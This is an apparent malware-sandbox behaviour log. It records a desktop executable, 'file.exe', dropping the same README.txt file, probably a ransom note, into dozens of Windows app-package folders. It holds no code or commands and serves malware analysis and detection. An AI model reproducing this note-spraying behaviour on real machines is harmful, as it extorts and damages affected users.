            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LocalFiles\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LocalFiles\1230\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\2\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\1\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\BackgroundTransferApi\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
